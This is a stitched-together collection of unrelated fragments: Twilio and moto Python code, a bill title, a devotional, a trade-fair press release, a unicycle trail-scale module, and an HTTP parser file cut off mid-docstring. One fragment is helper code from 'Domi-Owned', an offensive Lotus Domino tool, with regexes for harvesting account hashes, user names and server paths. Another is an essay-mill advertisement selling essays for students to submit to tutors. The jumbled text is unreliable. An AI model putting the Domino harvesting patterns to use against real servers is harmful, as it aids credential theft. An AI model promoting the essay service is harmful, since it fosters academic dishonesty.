r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class WebhookList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, assistant_sid):
"""
Initialize the WebhookList
:param Version version: Version that contains the resource
:param assistant_sid: The SID of the Assistant that is the parent of the resource
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookList
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookList
"""
super(WebhookList, self).__init__(version)
# Path Solution
self._solution = {'assistant_sid': assistant_sid, }
self._uri = '/Assistants/{assistant_sid}/Webhooks'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams WebhookInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'])
def list(self, limit=None, page_size=None):
"""
Lists WebhookInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of WebhookInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
"""
data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(method='GET', uri=self._uri, params=data, )
return WebhookPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of WebhookInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return WebhookPage(self._version, response, self._solution)
def create(self, unique_name, events, webhook_url, webhook_method=values.unset):
"""
Create the WebhookInstance
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode events: The list of space-separated events that this Webhook will subscribe to.
:param unicode webhook_url: The URL associated with this Webhook.
:param unicode webhook_method: The method to be used when calling the webhook's URL.
:returns: The created WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
data = values.of({
'UniqueName': unique_name,
'Events': events,
'WebhookUrl': webhook_url,
'WebhookMethod': webhook_method,
})
payload = self._version.create(method='POST', uri=self._uri, data=data, )
return WebhookInstance(self._version, payload, assistant_sid=self._solution['assistant_sid'], )
def get(self, sid):
"""
Constructs a WebhookContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
return WebhookContext(self._version, assistant_sid=self._solution['assistant_sid'], sid=sid, )
def __call__(self, sid):
"""
Constructs a WebhookContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
return WebhookContext(self._version, assistant_sid=self._solution['assistant_sid'], sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Autopilot.V1.WebhookList>'
class WebhookPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, response, solution):
"""
Initialize the WebhookPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param assistant_sid: The SID of the Assistant that is the parent of the resource
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
"""
super(WebhookPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of WebhookInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
return WebhookInstance(self._version, payload, assistant_sid=self._solution['assistant_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Autopilot.V1.WebhookPage>'
class WebhookContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, assistant_sid, sid):
"""
Initialize the WebhookContext
:param Version version: Version that contains the resource
:param assistant_sid: The SID of the Assistant that is the parent of the resource to fetch
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
super(WebhookContext, self).__init__(version)
# Path Solution
self._solution = {'assistant_sid': assistant_sid, 'sid': sid, }
self._uri = '/Assistants/{assistant_sid}/Webhooks/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch the WebhookInstance
:returns: The fetched WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return WebhookInstance(
self._version,
payload,
assistant_sid=self._solution['assistant_sid'],
sid=self._solution['sid'],
)
def update(self, unique_name=values.unset, events=values.unset,
webhook_url=values.unset, webhook_method=values.unset):
"""
Update the WebhookInstance
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode events: The list of space-separated events that this Webhook will subscribe to.
:param unicode webhook_url: The URL associated with this Webhook.
:param unicode webhook_method: The method to be used when calling the webhook's URL.
:returns: The updated WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
data = values.of({
'UniqueName': unique_name,
'Events': events,
'WebhookUrl': webhook_url,
'WebhookMethod': webhook_method,
})
payload = self._version.update(method='POST', uri=self._uri, data=data, )
return WebhookInstance(
self._version,
payload,
assistant_sid=self._solution['assistant_sid'],
sid=self._solution['sid'],
)
def delete(self):
"""
Deletes the WebhookInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete(method='DELETE', uri=self._uri, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Autopilot.V1.WebhookContext {}>'.format(context)
class WebhookInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, payload, assistant_sid, sid=None):
"""
Initialize the WebhookInstance
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
super(WebhookInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'url': payload.get('url'),
'account_sid': payload.get('account_sid'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'assistant_sid': payload.get('assistant_sid'),
'sid': payload.get('sid'),
'unique_name': payload.get('unique_name'),
'events': payload.get('events'),
'webhook_url': payload.get('webhook_url'),
'webhook_method': payload.get('webhook_method'),
}
# Context
self._context = None
self._solution = {'assistant_sid': assistant_sid, 'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: WebhookContext for this WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
"""
if self._context is None:
self._context = WebhookContext(
self._version,
assistant_sid=self._solution['assistant_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def url(self):
"""
:returns: The absolute URL of the Webhook resource
:rtype: unicode
"""
return self._properties['url']
@property
def account_sid(self):
"""
:returns: The SID of the Account that created the resource
:rtype: unicode
"""
return self._properties['account_sid']
@property
def date_created(self):
"""
:returns: The RFC 2822 date and time in GMT when the resource was created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The RFC 2822 date and time in GMT when the resource was last updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def assistant_sid(self):
"""
:returns: The SID of the Assistant that is the parent of the resource
:rtype: unicode
"""
return self._properties['assistant_sid']
@property
def sid(self):
"""
:returns: The unique string that identifies the resource
:rtype: unicode
"""
return self._properties['sid']
@property
def unique_name(self):
"""
:returns: An application-defined string that uniquely identifies the resource
:rtype: unicode
"""
return self._properties['unique_name']
@property
def events(self):
"""
:returns: The list of space-separated events that this Webhook is subscribed to.
:rtype: unicode
"""
return self._properties['events']
@property
def webhook_url(self):
"""
:returns: The URL associated with this Webhook.
:rtype: unicode
"""
return self._properties['webhook_url']
@property
def webhook_method(self):
"""
:returns: The method used when calling the webhook's URL.
:rtype: unicode
"""
return self._properties['webhook_method']
def fetch(self):
"""
Fetch the WebhookInstance
:returns: The fetched WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
return self._proxy.fetch()
def update(self, unique_name=values.unset, events=values.unset,
webhook_url=values.unset, webhook_method=values.unset):
"""
Update the WebhookInstance
:param unicode unique_name: An application-defined string that uniquely identifies the resource
:param unicode events: The list of space-separated events that this Webhook will subscribe to.
:param unicode webhook_url: The URL associated with this Webhook.
:param unicode webhook_method: The method to be used when calling the webhook's URL.
:returns: The updated WebhookInstance
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
"""
return self._proxy.update(
unique_name=unique_name,
events=events,
webhook_url=webhook_url,
webhook_method=webhook_method,
)
def delete(self):
"""
Deletes the WebhookInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Autopilot.V1.WebhookInstance {}>'.format(context)
|
1977 House Bill 2372. Resolve Providing For Study Of Nursing Home Rate Setting Procedures.
Title 1977 House Bill 2372. Resolve Providing For Study Of Nursing Home Rate Setting Procedures.
|
# Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging.handlers
import re
import sys
import tqdm
class Utilities(object):
"""
Utility functions.
"""
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close'
}
URL_REGEX = re.compile(r'(https?:\/\/[\d\w.:-]+)', re.I)
FORM_REGEX = re.compile(r'method[\'\"= ]{1,4}post[\'\"]?', re.I)
OPEN_REGEX = re.compile(r'name[\'\"= ]{1,4}notesview[\'\"]?', re.I)
ACCOUNT_REGEX = re.compile(r'/([a-f0-9]{32}/[a-f0-9]{32})', re.I)
USER_FIELD_REGEX = re.compile(r'user.+', re.I)
REDIRECT_FIELD_REGEX = re.compile(r'redirect.+', re.I)
NAMES_REGEX = re.compile(r'name[\'\"= ]{1,4}notesview[\'\"]?', re.I)
WEBADMIN_REGEX = re.compile(r'<title>.*administration</title>', re.I)
RESTRICTED_REGEX = re.compile(r'(notes exception|not authorized)', re.I)
VERSION_REGEX = re.compile(r'(?:version|domino administrator|domino|release)[=":\s]{0,4}([\d.]+)(?:\s|\")?', re.I)
LINUX_USER_REGEX = re.compile(r'([a-z0-9-_].+):(.+)', re.I)
WINDOWS_USER_REGEX = re.compile(r'(.+)\\(.+)', re.I)
PATH_REGEX = re.compile(r'DataDirectory\s*=\s*\'(.+)\';', re.I)
def set_logging(self):
"""
Configure the basic logging environment for the application.
"""
logger = logging.getLogger('DomiOwned')
logger.setLevel(logging.DEBUG)
custom_format = CustomLoggingFormatter()
handler = logging.StreamHandler()
handler.setFormatter(custom_format)
logger.addHandler(handler)
return logger
def parse_credentials(self, value):
"""
Handle credentials if value is None.
"""
return '' if value is None else value
def check_url(self, url):
"""
Check for valid base URL.
"""
if self.URL_REGEX.search(url):
return self.URL_REGEX.search(url).group(1)
else:
self.logger.error('Invalid URL provided')
sys.exit()
def setup_progress(self, total):
"""
Setup progress bar.
"""
progress_bar = tqdm.tqdm(
total=total,
desc="Progress",
smoothing=0.5,
bar_format='{desc}{percentage:3.0f}%|{bar}|({n_fmt}/{total_fmt})|{elapsed} '
)
return progress_bar
class CustomLoggingFormatter(logging.Formatter):
"""
Custom logging formatter.
"""
DEBUG_FORMAT = "\033[1m\033[34m[*]\033[0m %(msg)s"
INFO_FORMAT = "\033[1m\033[32m[+]\033[0m %(msg)s"
WARN_FORMAT = "\033[1m\033[33m[!]\033[0m %(msg)s"
ERROR_FORMAT = "\033[1m\033[31m[-]\033[0m %(msg)s"
def __init__(self):
super().__init__(fmt="%(levelno)d: %(msg)s", datefmt=None, style='%')
def format(self, record):
orig_format = self._style._fmt
if record.levelno == logging.DEBUG:
self._style._fmt = CustomLoggingFormatter.DEBUG_FORMAT
elif record.levelno == logging.INFO:
self._style._fmt = CustomLoggingFormatter.INFO_FORMAT
elif record.levelno == logging.WARN:
self._style._fmt = CustomLoggingFormatter.WARN_FORMAT
elif record.levelno == logging.ERROR:
self._style._fmt = CustomLoggingFormatter.ERROR_FORMAT
result = logging.Formatter.format(self, record)
self._style._fmt = orig_format
return result
class Banner(object):
"""
Domi-Owned visual banner.
"""
SHOW = """
__________ __________ __________
| |\| | |\\
| * * ||| * * * | * ||
| * * ||| | * ||
| * * ||| * * * | * ||
|__________|||__________|__________||
| || `---------------------`
| * * ||
| ||
| * * ||
|__________||
`----------`
IBM/Lotus Domino OWNage
"""
|
Sometimes God sends a prophet before a deliverer (cf. Judges 6:7-10 and 11ff.). The main task of a prophet is to speak the truth to power, whereas the main task of a deliver is to act with God’s help to move the people in a different (more faithful) direction. Sometimes God calls the same person to act as prophet and deliverer, but when this is not the case the prophet is often hated. Why? Because they deliver a painful message to the people that discloses the gap between where they are and where God wants them to be, forcing them sit in the discomfort of the gap without quick solutions. No one likes to sit in the discomfort created by the tension between what is and what should be. By the time the prophetic truth sinks in and the deliver comes, many are ready to kill the prophet! It is more glorious to help people solve their problems than to show them their problems, but the role of prophet has always been essential in God’s great rescue mission of this world. I often wonder if one of the main problems in mainline Protestantism today is its lack of prophets (or our refusal to hear the message of the prophets). Take a few minutes during your devotional time to pray for God’s prophets today.
|
from __future__ import unicode_literals
from moto.core.responses import BaseResponse
class VPCPeeringConnections(BaseResponse):
def create_vpc_peering_connection(self):
vpc = self.ec2_backend.get_vpc(self._get_param('VpcId'))
peer_vpc = self.ec2_backend.get_vpc(self._get_param('PeerVpcId'))
vpc_pcx = self.ec2_backend.create_vpc_peering_connection(vpc, peer_vpc)
template = self.response_template(
CREATE_VPC_PEERING_CONNECTION_RESPONSE)
return template.render(vpc_pcx=vpc_pcx)
def delete_vpc_peering_connection(self):
vpc_pcx_id = self._get_param('VpcPeeringConnectionId')
vpc_pcx = self.ec2_backend.delete_vpc_peering_connection(vpc_pcx_id)
template = self.response_template(
DELETE_VPC_PEERING_CONNECTION_RESPONSE)
return template.render(vpc_pcx=vpc_pcx)
def describe_vpc_peering_connections(self):
vpc_pcxs = self.ec2_backend.get_all_vpc_peering_connections()
template = self.response_template(
DESCRIBE_VPC_PEERING_CONNECTIONS_RESPONSE)
return template.render(vpc_pcxs=vpc_pcxs)
def accept_vpc_peering_connection(self):
vpc_pcx_id = self._get_param('VpcPeeringConnectionId')
vpc_pcx = self.ec2_backend.accept_vpc_peering_connection(vpc_pcx_id)
template = self.response_template(
ACCEPT_VPC_PEERING_CONNECTION_RESPONSE)
return template.render(vpc_pcx=vpc_pcx)
def reject_vpc_peering_connection(self):
vpc_pcx_id = self._get_param('VpcPeeringConnectionId')
self.ec2_backend.reject_vpc_peering_connection(vpc_pcx_id)
template = self.response_template(
REJECT_VPC_PEERING_CONNECTION_RESPONSE)
return template.render()
CREATE_VPC_PEERING_CONNECTION_RESPONSE = """
<CreateVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnection>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
</accepterVpcInfo>
<status>
<code>initiating-request</code>
<message>Initiating request to {accepter ID}.</message>
</status>
<expirationTime>2014-02-18T14:37:25.000Z</expirationTime>
<tagSet/>
</vpcPeeringConnection>
</CreateVpcPeeringConnectionResponse>
"""
DESCRIBE_VPC_PEERING_CONNECTIONS_RESPONSE = """
<DescribeVpcPeeringConnectionsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnectionSet>
{% for vpc_pcx in vpc_pcxs %}
<item>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
</accepterVpcInfo>
<status>
<code>{{ vpc_pcx._status.code }}</code>
<message>{{ vpc_pcx._status.message }}</message>
</status>
<expirationTime>2014-02-17T16:00:50.000Z</expirationTime>
<tagSet/>
</item>
{% endfor %}
</vpcPeeringConnectionSet>
</DescribeVpcPeeringConnectionsResponse>
"""
DELETE_VPC_PEERING_CONNECTION_RESPONSE = """
<DeleteVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</DeleteVpcPeeringConnectionResponse>
"""
ACCEPT_VPC_PEERING_CONNECTION_RESPONSE = """
<AcceptVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcPeeringConnection>
<vpcPeeringConnectionId>{{ vpc_pcx.id }}</vpcPeeringConnectionId>
<requesterVpcInfo>
<ownerId>123456789012</ownerId>
<vpcId>{{ vpc_pcx.vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.vpc.cidr_block }}</cidrBlock>
</requesterVpcInfo>
<accepterVpcInfo>
<ownerId>777788889999</ownerId>
<vpcId>{{ vpc_pcx.peer_vpc.id }}</vpcId>
<cidrBlock>{{ vpc_pcx.peer_vpc.cidr_block }}</cidrBlock>
</accepterVpcInfo>
<status>
<code>{{ vpc_pcx._status.code }}</code>
<message>{{ vpc_pcx._status.message }}</message>
</status>
<tagSet/>
</vpcPeeringConnection>
</AcceptVpcPeeringConnectionResponse>
"""
REJECT_VPC_PEERING_CONNECTION_RESPONSE = """
<RejectVpcPeeringConnectionResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</RejectVpcPeeringConnectionResponse>
"""
|
It used to happen to me every time our tutor set us an essay, I would run out of time before I had even started to write. Every time I needed to write I would have to work, I would be needed for something by my family or any one of 100 different things that needed to be done. It was just impossible to get some quality time to spend on my essays, but without the time the essays that I submitted were far from the best that I could have produced. What I needed was an affordable essay writing service, not a cheap essay as such but a cheap service to provide a good quality essay that would keep my tutor happy.
There are cheap writing services and there are cheap writing services; some are cheap because the product is cheap. I have seen services that will provide you with a direct copy of another essay or a patchwork essay made up from several other essays and articles; whichever way they do it copying is a sure way to get yourself in some serious trouble. When you try to find cheap essay writing services you must ensure that they are completely free of any form of plagiarism. Cheap essays may also be very poor quality; some companies keep the costs reduced by outsourcing all of their writing to countries where they only have to pay a couple of dollars each day, countries where English is not the first language. The result of this is that the essays are written very poorly in far from perfect English. So what you really want is a company that provides cheap essays by being efficient at what they do; cheap in price but high in quality.
The Custom Essay Writing Service may not be the absolute cheapest service that you could find but it will provide you with a quality cheap essay. Their writers all originate from countries such as the UK where English is spoken as a first language. They employ writers who have a huge amount of essay writing experience and higher level qualifications in the subjects that you wish to write about. You can therefore be sure that they will produce high quality essays which are on subject and in perfect English and grammar. All essays are also checked for copying as well as for their quality before they are finally released to you for use. You can be confident that their service will not only satisfy you but delight you, so if you need cheap essays contact them today for a perfect quality essay.
|
# -*- coding: utf-8 -*-
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext_lazy as _
class Mscale(object):
"""
M scale, describing the difficultiy of a single muni trail section.
"""
levels = (0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0)
def __init__(self, *args, **kwargs):
"""
initial values can be provided via kwargs.
:param number: difficulty level, e.g. 2 for M2
:type number: int
:param underground: description of the trail underground
:type underground: str.
:param slope: slope
:param obstacles: list of obstacles
:type obstacles: list
:param characteristics: list of other characteristics
that describe the trail section
:type characteristics: list
"""
self.number = float(kwargs.pop(u"number", 0))
self.underground = kwargs.pop(u"underground", "")
self.slope = kwargs.pop(u"slope", "")
self.obstacles = kwargs.pop(u"obstacles", [])
self.characteristics = kwargs.pop(u"characteristics", [])
def __unicode__(self):
return force_unicode(u"M%s" % self.number or u'M')
def __str__(self):
return str(self.__unicode__())
def __eq__(self, other):
if isinstance(other, Mscale):
return self.number == other.number
elif isinstance(other, (int, float)):
return self.number == other
else:
return False
# raise TypeError(u"Cannot compare Mscale object with %s" % str(other))
def __ne__(self, other):
return not self.__eq__(other)
def __cmp__(self, other):
"""
Also allows comparisons between mscale instances and numbers.
"""
if (isinstance(other, Mscale)):
return cmp(self.number, other.number)
elif (isinstance(other, int) or isinstance(other, float)):
return cmp(self.number, other)
else:
raise TypeError(_(u"Cannot compare Mscale object with {0}").format(other))
def __hash__(self):
return hash(unicode(self))
MSCALES = {}
MSCALES[0] = Mscale(number=0.0,
underground=_(u"pavement or solid soil/compact gravel"),
slope="< 20 %",
obstacles=[_(u"no obstacles")],
characteristics=[_(u"90° turns within > 2 m and with slope < 10 %")]
)
MSCALES[0.5] = Mscale(number=0.5)
MSCALES[1] = Mscale(number=1.0,
underground=_(u"partly loose soil/gravel"),
slope="< 40 %",
obstacles=[_(u"small obstacles, approx. 5cm high (small stones, flat roots)"),
_(u"single 15 cm steps")],
characteristics=[_(u"90° turn within > 1 m and with slope < 20 %")]
)
MSCALES[1.5] = Mscale(number=1.5)
MSCALES[2] = Mscale(number=2.0,
underground=_(u"loose soil/gravel"),
slope="< 60 %",
obstacles=[_(u"obstacles, approx. 10 cm high (stones, roots"),
_(u"single 30 cm steps")
],
characteristics=[_(u"90° turn within > 0.5 m and with slope < 30 %")]
)
MSCALES[2.5] = Mscale(number=2.5)
MSCALES[3] = Mscale(number=3.0,
underground=_(u"loose soil with loose stones (size of few cm)"),
slope="< 80 %",
obstacles=[_(u"obstacles that are approx 20cm high (stones, roots)"),
_(u"several irregular steps, approx. 20 cm each"),
_(u"drops < 1 m"),
_(u"gaps < 0.5 m")],
characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 40 %")]
)
MSCALES[3.5] = Mscale(number=3.5)
MSCALES[4] = Mscale(number=4.0,
underground=_(u"very loose/slippery soil with loose stones (size of several cm)"),
slope="< 100 %",
obstacles=[_(u"big obstacles (stones, logs ~ 30 cm)"),
_(u"several irregular steps ~ 30 cm each"),
_(u"drops < 1.5 m"),
_(u"gaps < 1 m")],
characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 60 %")]
)
MSCALES[4.5] = Mscale(number=4.5)
MSCALES[5] = Mscale(number=5.0,
underground=_(u"very loose/slippery soil with loose stones (size of several cm)"),
slope="> 100 %",
obstacles=[_(u"very big obstacles (stones, logs ~ 40 cm)"),
_(u"several irregular steps ~ 40 cm each"),
_(u"drops > 1.5 m, gaps > 1 m")],
characteristics=[_(u"135° turn within ~ 0.5 m and with slope < 80 %")]
)
MSCALE_CHOICES = tuple((m, "M %s" % str(m).replace(".0", "")) for m in Mscale.levels)
|
Every day, our world grows more and more connected. This is something the electronics specialist BFFT from Gaimersheim near the Bavarian city of Ingolstadt recognized early on. Consequently, the company has been developing digital connectivity technology for cars for many years. Now, for the first time, BFFT has presented its portfolio at a global connectivity trade fair –Mobile World Congress in Barcelona. At the booth of parent company EDAG Engineering GmbH, the BFFT specialists showcased their innovative CShark automation tool as well as other highlights.
(Gaimersheim, March 8, 2018) – The more digital our lives become, the more challenging it is to connect all these services with each other. Smartphones with different operating systems have to be understood by different devices and work together in a global system. This applies especially to the automotive industry, where the question of how to achieve valid end-to-end protection of continuously evolving functions presents a particularly complex challenge. It is precisely here that BFFT and EDAG have positioned themselves as a strong team – at the interface between the collected vehicle data and the digital services derived from it. After all, in today’s world, data is the new currency.
In Barcelona, BFFT presented its CShark automation framework at the booth of its parent company EDAG. This basic modular framework allows customers to automatically test the various components of an infotainment system both individually and in the complete end-to-end chain. From simulation of the entire vehicle through to the subsequent comparison of the simulated data with a front end, BFFT covers the full security chain for in-vehicle online services. These tests can be conveniently managed and launched from a web portal or an app. “Customers can also use them to directly evaluate and share the test results,” explains Markus Fichtner, CEO of BFFT. As well as integrating software and apps into the automation framework, BFFT also offers the customized incorporation of hardware components into its proprietary system. CShark has been used in regular production since 2016 and is currently employed in the end-to-end protection of various mobile online services in the automobile sector.
BFFT has also positioned itself as an expert partner in the sphere of big data. Together with EDAG, the electronics specialists showed curious visitors how continuously collected vehicle data can be productively applied and marketed in the future. For example, machine learning and artificial intelligence could be used to optimize digital service applications, such as weather services or the real-time navigation to free parking spaces. In such scenarios, drivers would of course decide for themselves what data they want to release and what they want to withhold.
Our sincerest thanks to all the visitors and guests who showed interest in our products. BFFT is already looking forward to the next Mobile World Congress in 2019.
|
# -*- coding: utf-8 -*-
"""
pycohttpparser/api
~~~~~~~~~~~~~~~~~~
Defines the public API to pycohttpparser.
"""
from collections import namedtuple
from ._pycohttpparser import lib, ffi
Request = namedtuple(
'Request', ['method', 'path', 'minor_version', 'headers', 'consumed']
)
Response = namedtuple(
'Response', ['status', 'msg', 'minor_version', 'headers', 'consumed']
)
class ParseError(Exception):
"""
An invalid HTTP message was passed to the parser.
"""
class Parser(object):
"""
A single HTTP parser object. This object can parse HTTP requests and
responses using picohttpparser.
This object is not thread-safe, and it does maintain state that is shared
across parsing requests. For this reason, make sure that access to this
object is synchronized if you use it across multiple threads.
"""
def __init__(self):
# Store some instance variables. This represents essentially static
# allocations that are used repeatedly in some of the parsing code.
# This avoids the overhead of repeatedly allocating large chunks of
# memory each time a parse is called.
# Allocate all the data that will come out of the method.
self._method = self._msg = ffi.new("char **")
self._method_len = self._msg_len = ffi.new("size_t *")
self._path = ffi.new("char **")
self._path_len = ffi.new("size_t *")
self._minor_version = ffi.new("int *")
self._status = ffi.new("int *")
# Allow space for 1000 headers. Anything more is clearly nonsense.
self._header_count = 1000
self._headers = ffi.new("struct phr_header [1000]")
self._num_headers = ffi.new("size_t *", self._header_count)
def parse_request(self, buffer):
"""
Parses a single HTTP request from a buffer.
